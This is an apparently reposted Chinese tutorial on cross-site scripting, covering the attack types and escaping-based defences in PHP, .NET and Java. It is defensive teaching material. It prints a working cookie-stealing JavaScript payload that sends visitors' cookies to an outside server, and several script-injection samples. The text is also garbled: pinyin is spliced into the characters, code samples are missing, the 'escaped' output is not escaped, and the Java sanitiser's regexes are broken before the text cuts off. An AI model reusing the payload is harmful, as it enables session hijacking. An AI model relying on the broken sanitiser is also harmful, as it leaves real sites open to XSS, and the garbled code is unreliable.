&

[點(diǎn)晴永久免費(fèi)OA]Web安全之XSS跨站腳本攻擊

當(dāng)前位置：點(diǎn)晴教程→點(diǎn)晴OA辦公管理信息系統(tǒng) →『經(jīng)驗(yàn)分享&問(wèn)題答疑』

admin

2020年4月8日 11:43 本文熱度 3206

本文主要選擇常見(jiàn)web攻擊手段之一的XSS（跨站點(diǎn)腳本攻擊）來(lái)進(jìn)行講解，說(shuō)明其攻擊原理，并提出相應(yīng)的解決辦法。

XSS

XSS 攻擊，全稱是“跨站點(diǎn)腳本攻擊”（Cross Site Scripting），之所以縮寫為 XSS，主要是為了和“層疊樣式表”（Cascading Style Sheets，CSS）區(qū)別開(kāi)，以免混淆。

XSS是一種經(jīng)常出現(xiàn)在web應(yīng)用中的計(jì)算機(jī)安全漏洞，它允許惡意web用戶將代碼植入到提供給其他用戶使用的頁(yè)面中。XSS是針對(duì)Web站點(diǎn)的客戶隱私的攻擊，當(dāng)客戶詳細(xì)信息失竊或受控時(shí)可能引發(fā)徹底的安全威脅。大部分網(wǎng)站攻擊只涉及兩個(gè)群體：黑客和 Web 站點(diǎn)，或者黑客和客戶端受害者。與那些攻擊不同的是，XSS 攻擊同時(shí)涉及三個(gè)群體：黑客、客戶端和 Web 站點(diǎn)。XSS 攻擊的目的是盜走客戶端 cookies，或者任何可以用于在 Web 站點(diǎn)確定客戶身份的其他敏感信息。手邊有了合法用戶的標(biāo)記，黑客可以繼續(xù)扮演用戶與站點(diǎn)交互，從而冒充用戶。

舉例來(lái)說(shuō)，可以利用 XSS 攻擊窺視用戶的信用卡號(hào)碼和私有信息。通過(guò)利用 Web 站點(diǎn)的訪問(wèn)特權(quán)，在受害者（客戶端）瀏覽器上運(yùn)行惡意的JavaScript代碼來(lái)實(shí)現(xiàn)。這些是非常有限的JavaScript特權(quán)，除了與站點(diǎn)相關(guān)的信息，一般不允許腳本訪問(wèn)其他任何內(nèi)容。重點(diǎn)強(qiáng)調(diào)的是，雖然 Web 站點(diǎn)上存在安全漏洞，但是 Web 站點(diǎn)從未受到直接傷害。但是這已經(jīng)足夠讓腳本收集 cookies，并且將它們發(fā)送給黑客。

跨站腳本攻擊有兩種攻擊形式：

1. 反射型跨站腳本攻擊

攻擊者會(huì)通過(guò)社會(huì)工程學(xué)手段，發(fā)送一個(gè)URL連接給用戶打開(kāi)，在用戶打開(kāi)頁(yè)面的同時(shí)，瀏覽器會(huì)執(zhí)行頁(yè)面中嵌入的惡意腳本。

2. 存儲(chǔ)型跨站腳本攻擊

攻擊者利用web應(yīng)用程序提供的錄入或修改數(shù)據(jù)功能，將數(shù)據(jù)存儲(chǔ)到服務(wù)器或用戶cookie中，當(dāng)其他用戶瀏覽展示該數(shù)據(jù)的頁(yè)面時(shí)，瀏覽器會(huì)執(zhí)行頁(yè)面中嵌入的惡意腳本。所有瀏覽者都會(huì)受到攻擊。

3. DOM跨站攻擊

由于html頁(yè)面中，定義了一段JS，根據(jù)用戶的輸入，顯示一段html代碼，攻擊者可以在輸入時(shí)，插入一段惡意腳本，最終展示時(shí)，會(huì)執(zhí)行惡意腳本。

DOM跨站和以上兩個(gè)跨站攻擊的差別是，DOM跨站是純頁(yè)面腳本的輸出，只有規(guī)范使用javascript，才可以防御。

原理

讀到這里，相信大家對(duì)XSS的概率已經(jīng)有了一定的理解，下面我們通過(guò)舉例來(lái)說(shuō)說(shuō)攻擊的原理。

如果下面是我們網(wǎng)站的一段PHP代碼：

<tr>

</tr>

那么攻擊者可以在添加產(chǎn)品時(shí)插入惡意腳本：

攻擊者發(fā)布產(chǎn)品后，等待用戶瀏覽產(chǎn)品列表頁(yè)面，用戶瀏覽頁(yè)面如下：

就會(huì)執(zhí)行攻擊者寫的inbreak.net/a.js惡意腳本。腳本內(nèi)容如下：

a=document.createElement("iframe");

function b(){e=escape(document.cookie);

c=["http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie=",e,Math.random()];

document.body.appendChild(a);a.src=c.join();}

setTimeout(''b()'',5000);

其功能是獲取當(dāng)前瀏覽者的cookie，并發(fā)送到a.php，用戶的cookie已經(jīng)就會(huì)到攻擊者的服務(wù)器上。攻擊者利用瀏覽器插件，將自己的cookie替換成剛剛獲取的用戶的cookie，就可以貍貓換太子的冒充用戶了。

防御

原理說(shuō)清楚了，再來(lái)談?wù)勅绾畏烙伞?/span>

最基本的防御就是對(duì)用戶的輸入進(jìn)行轉(zhuǎn)義，例如

如果直接保存這個(gè)字符串的話，然后再輸出的話，就會(huì)運(yùn)行JS了。

我們需要將這個(gè)字符串轉(zhuǎn)義成：

"<script type=''text/javascript''>alert(''hello world'')</script>"

有些語(yǔ)言自帶的就有一些函數(shù)來(lái)實(shí)現(xiàn)轉(zhuǎn)義的功能。

比如php中，提供了 htmlspecialchars() 函數(shù)可以將HTML 特殊字符轉(zhuǎn)化成在網(wǎng)頁(yè)上顯示的字符實(shí)體編碼。這樣即使用戶輸入了各種HTML 標(biāo)記，在讀回到瀏覽器時(shí)，會(huì)直接顯示這些HTML 標(biāo)記，而不是解釋執(zhí)行。

這里舉一個(gè)例子：

攻擊者輸入：

結(jié)果為：

<b>歡迎：<script>evil_script()</script></b>

分析可以得知，在HTML 正文背景下，< > 字符會(huì)引入HTML 標(biāo)記，& 可能會(huì)認(rèn)為字符實(shí)體編碼的開(kāi)始，所以需要將< > & 轉(zhuǎn)義。為簡(jiǎn)潔起見(jiàn)，直接使用 htmlspecialchars() 將5 種HTML 特殊字符轉(zhuǎn)義，如：

其中ENT_NOQUOTES的意思是不對(duì)單引號(hào)和雙引號(hào)進(jìn)行編碼。

而其他語(yǔ)言，比如.net，則有微軟提供的類庫(kù)AntiXSS，它的實(shí)現(xiàn)原理是白名單機(jī)制。使用起來(lái)也很簡(jiǎn)單，就是通過(guò)AntiXss.GetSafeHtmlFragment(html)方法，來(lái)替換掉html里的危險(xiǎn)字符。代碼如下：

var html = "<a href=\"#\" onclick=\"alert();\">aaaaaaaaa</a>javascript<P><IMG SRC=javascript:alert(''XSS'')><javascript>alert(''a'')</javascript><IMG src=\"abc.jpg\"><IMG><P>Test</P>";

string safeHtml = AntiXss.GetSafeHtmlFragment(html);

Console.WriteLine(safeHtml);

上面的危險(xiǎn)內(nèi)容會(huì)被成功替換為：

<a href="">aaaaaaaaa</a>javascript

<p><img src="">alert(''a'')<img src="abc.jpg"><img></p>

同樣的，在java中，也可以通過(guò)引入第三方的jar包，來(lái)避免XSS攻擊，比如commons-lang-2.5.jar。

即使不使用自帶的方法或者第三方庫(kù)，我們還可以通過(guò)自己編寫方法來(lái)實(shí)現(xiàn)轉(zhuǎn)義。

private String cleanXSS(String value) {

value = value.replaceAll("<", "& lt;").replaceAll(">", "& gt;");

value = value.replaceAll("\$", "& #40;").replaceAll("\$", "& #41;");

value = value.replaceAll("''", "& #39;");

value = value.replaceAll("eval\$(.*)\$", "");